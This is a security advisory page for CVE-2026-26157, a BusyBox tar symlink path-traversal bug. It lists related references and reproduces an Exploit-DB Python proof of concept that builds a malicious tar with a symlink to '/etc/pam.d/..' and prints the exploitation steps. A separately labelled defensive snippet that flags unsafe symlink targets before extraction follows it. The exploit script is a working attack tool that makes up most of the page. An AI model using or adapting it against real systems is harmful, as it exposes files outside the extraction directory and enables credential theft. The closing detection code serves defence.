BusyBox 1.37.0 Path Traversal

Reported by Calil Khalil, 05 May 2026 00:00:00
Type: packetstorm
Source: packetstorm.news

BusyBox path traversal in tar extraction (CVE-2026-26157) allows arbitrary file read.

Related

Family     | Title                                                                                                                         | Published         | Source
-----------|-------------------------------------------------------------------------------------------------------------------------------|-------------------|------------
ATTACKERKB | CVE-2026-26157                                                                                                                | 11 Feb 2026 20:27 | attackerkb
CBLMariner | CVE-2026-26157 affecting package busybox for versions less than 1.35.0-17                                                     | 19 Feb 2026 22:21 | cbl_mariner
CBLMariner | CVE-2026-26157 affecting package busybox for versions less than 1.36.1-22                                                     | 24 Feb 2026 01:08 | cbl_mariner
Circl      | CVE-2026-26157                                                                                                                | 12 Mar 2026 12:17 | circl
CNNVD      | BusyBox security vulnerability                                                                                                | 11 Feb 2026 00:00 | cnnvd
CVE        | CVE-2026-26157                                                                                                                | 11 Feb 2026 20:27 | cve
Cvelist    | CVE-2026-26157 Busybox: busybox: arbitrary file overwrite and potential code execution via incomplete path sanitization       | 11 Feb 2026 20:27 | cvelist
Debian CVE | CVE-2026-26157                                                                                                                | 11 Feb 2026 20:27 | debiancve
Exploit DB | BusyBox 1.37.0 - Path Traversal                                                                                               | 30 Apr 2026 00:00 | exploitdb
NVD        | CVE-2026-26157                                                                                                                | 11 Feb 2026 21:16 | nvd
# Exploit Title: BusyBox 1.37.0 - Path Traversal
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.

This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
  cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
  if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""

import tarfile
import sys
import os

def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.

    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """

    exploit_file = 'CVE-2026-26157_exploit.tar'

    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)

        print(f"[+] Exploit created: {exploit_file}")
        print(f"\n[*] Exploitation steps:")
        print(f"  1. mkdir test_extraction && cd test_extraction")
        print(f"  2. busybox tar xf ../{exploit_file}")
        print(f"  3. readlink -f sensitive_data")
        print(f"     Expected output: /etc")
        print(f"  4. ls sensitive_data/")
        print(f"     Result: Lists /etc directory contents")
        print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
        print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")

        return exploit_file

    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)

def show_technical_details():
    """Display technical analysis of the vulnerability"""

    print("\n" + "="*70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("="*70)
    print("\nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print("  cp2 = strstr(cp, \"/../\");  // Only matches 4-char sequence")
    print("  if (!cp2) break;")
    print("\nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print("  Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print("  Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("="*70 + "\n")

if __name__ == "__main__":
    print("="*70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("="*70)

    # Display technical analysis
    show_technical_details()

    # Create exploit
    exploit_file = create_exploit()

    print("\n[*] Mitigation:")
    print("  - Update BusyBox to patched version")
    print("  - Patch applies strip_unsafe_prefix() to symlink targets")
    print("  - Do not extract untrusted archives with elevated privileges")

    print("\n[*] For educational and authorized testing purposes only")
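The root-cause note above says a substring match on "/../" misses a trailing "/..". The following is an added example, not part of the advisory or of BusyBox: it contrasts a substring test modelled on the quoted strstr line with a component-wise test, and scans a tar archive (constructed in memory, with the symlink shape the advisory describes) for symlink members whose target is absolute or contains a ".." component, before anything is extracted.

```python
import io
import tarfile


def weak_check(path: str) -> bool:
    """Substring test in the style of the quoted strstr(cp, "/../") line."""
    return "/../" in path


def has_parent_component(path: str) -> bool:
    """True when any '/'-separated component is '..', a trailing one included."""
    return any(part == ".." for part in path.split("/"))


def unsafe_symlinks(tar_bytes: bytes) -> list:
    """List (name, linkname) for symlink members whose target is absolute or
    contains a '..' component. Runs on the raw archive, before extraction."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if not member.issym():
                continue
            target = member.linkname
            if target.startswith("/") or has_parent_component(target):
                hits.append((member.name, target))
    return hits


def build_sample_archive() -> bytes:
    """Constructed sample archive: a benign relative symlink plus one whose
    target ends in '/..', the shape the advisory describes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        ok = tarfile.TarInfo("docs/readme_link")
        ok.type = tarfile.SYMTYPE
        ok.linkname = "README.txt"
        tar.addfile(ok)
        bad = tarfile.TarInfo("sensitive_data")
        bad.type = tarfile.SYMTYPE
        bad.linkname = "/etc/pam.d/.."
        tar.addfile(bad)
    return buf.getvalue()


if __name__ == "__main__":
    target = "/etc/pam.d/.."
    print("substring check:", weak_check(target))            # False: the gap
    print("component check:", has_parent_component(target))  # True
    print("flagged members:", unsafe_symlinks(build_sample_archive()))
```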


Current as of 05 May 2026 00:00
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 7
EPSS: 0.00114
Views: 27